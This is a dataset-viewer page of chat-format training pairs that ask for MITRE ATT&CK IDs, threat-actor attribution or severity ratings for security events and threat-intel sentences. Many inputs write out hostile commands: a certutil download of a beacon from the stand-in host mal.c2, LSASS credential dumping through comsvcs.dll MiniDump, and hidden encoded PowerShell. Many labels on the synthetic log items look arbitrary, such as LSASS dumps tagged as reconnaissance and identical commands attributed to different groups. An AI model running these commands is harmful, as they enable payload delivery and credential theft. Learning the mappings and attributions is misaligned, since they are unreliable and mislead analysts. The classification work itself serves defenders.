messages listlengths 2 2 |
|---|
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.70.243.209",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Olympic Destroyer attempts to copy itself to remote machines on the network.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1570\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"con... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-BP9C9232GG)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Collection, Execution",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 622 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.131.61.27",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0007\"], \"techniques\": [\"T... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-Z565TRC8LU)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Defense Evasion",
"role": "user"
},
{
"content"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.190.47.149",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniqu... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3211 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.128.124.62",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0043\"], \"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-P23TSFOPR8)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "{\"severity\": \"High\",... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"c... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.156.99.54",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0040\", \"TA0003\"],... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Turla has used the VPS infrastructure of compromised Iranian threat actors.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1584.003\", \"T1584\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-9HLNYENQHV)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Reconnaissance, Collection",
"role": "user"
},
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2740 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.92.48.204",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0009\", \"TA0043\"], ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-O4AEQUSHU3)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Impact, Persistence, Exfiltration",
"role": "user"
},
{
"content": "... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"con... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2156 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1610 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1467 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.115.86.156",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0006\", \"TA0001\"], \"te... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: SDBbot has the ability to use the command shell to execute commands on a compromised host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}",
"role":... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: P8RAT can download additional payloads to a target system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.116.86.59",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0004\", \"TA0007\"], \"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2041 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.33.71.206",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1059.001... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"co... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.182.109.68",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"tec... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-DCNMAVZF2T)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Exfiltration, Impact",
"role": "user"
},
{
"con... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID lsass.dmp full",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.001\"]}",
"role": "assist... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp .)",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1046\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.75.132.213",
"role": "user"
},
{
"content": "{\"tactics\": ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Explosive has encrypted communications with the RC4 method.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1573\", \"T1573.001\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-LOOUZ79MQ4)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Defense Evasion, Exfiltration, Persistence",
"role": "user"
},
{
"conte... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-EE2JN3068N)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Reconnaissance, Exfiltration",
"role": "user"
}... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-S0756JEEXD)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Initial Access, Credential Access",
"role": "user"
},
{
"content"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"confide... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may also leverage a Network Device CLI on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes.",
"role": "u... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"con... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CaddyWiper can enumerate all files and directories on a compromised host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"High\"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.189.58.243",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\"], \"tec... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-J336LMXZXU)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": \"Crit... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.130.209.16",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techni... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 823 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.96.222.205",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0010\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1971 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.127.95.102",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0004\"], \"techniques\": ... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.123.160.39",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0002\"], \"techniques\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Pan... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-XSU3T9MCAF)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Discovery",
"role": "user"
},
{
"content": "{\"severity\": \"Hi... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.92.26.227",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0002\", \"TA0009\... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 955 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.164.179.16",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1021.006\... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.85.97.52",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0006\"],... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.189.218.254",
"role": "user"
},
{
"content": "{\"tactics\": [... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: JHUHUGIT has a command to download files to the victim’s machine.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-EP1RW91EMC)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Credential Access, Execution, Exfiltration",
"role": "user"
},
{
"conte... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", \"confidenc... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3468 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.131.54.238",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0002\"], \"techniques\... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.138.4.14",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0002\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-OO2CEK72BI)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Persistence, Reconnaissance, Credential Access",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-5DRNLOW7MB)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Execution",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.19.149.84",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0010\", \"TA0040\"], \"technique... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The plugin uses the same network protocol as PLAINTEE and so we were able to trivially decode further commands that were sent. The following commands were observed: tasklist ipconfig /all The attacker performed these tw... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 934 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.141.223.184",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0009\... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Bazar can also check if the Russian language is installed on the infected machine and terminate if it is found.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}",
"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-WAE0CKK9GP)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content":... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.185.157.25",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0004\", \"TA00... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.163.88.195",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Ecipekac can use XOR, AES, and DES to encrypt loader shellcode.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Ensure proper Registry permissions are in place to prevent adversaries from disabling or interfering with security services.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1562.001\", \"T1... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.132.119.117",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"tech... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Using rundll32.exe, vice executing directly ( Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations.",
"role"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: /var/log/kern.log: Kernel logs",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.146.81.182",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 578 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.160.112.103",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1021.00... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.33.199.233",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0008\", \"TA0003\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1026 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", \"con... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: After the cookie is obtained through Steal Web Session Cookie or Web Cookies, the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\",... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2494 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.85.221.18",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.178.114.177",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0001\", \"TA0040\"], \"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-1L4L0XE24W)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 713 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confi... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for commands with arguments (such as opening common command-line editors) used to modify plist files, especially commonly abused files such as those in \\~/LaunchAgents, \\~/Library/Application Support/com.ap... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.132.119.5",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0009\", \"TA0004\"],... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: HKCU\\Software\\Microsoft\\Office test\\Special\\Perf",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.113.82.96",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T156... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Rover copies files from removable drives to C:\\system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1074.001\", \"T1074\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-TC7EU1XQ4W)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"s... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Service paths and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (, C:\\unsafe path with space\\program.exe vs. \"C:\\safe path with space\\progra... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2916 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\":... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Any matching files are encrypted and written to a local user directory.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1119\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Clambling can use cmd.exe for command execution.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.17.246.139",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0040\", \"TA0006\"], \... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-0QOWSB1UPQ)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Discovery, Defense Evasion",
"role": "user"
},
{
"co... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Pan... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-UNEOB5S96I)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Collection, Initial Access, Persistence",
"role": "user"
},
{
"content": ... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.56.68.41",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.45.255.169",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0008\"], \"techniques\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"conf... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.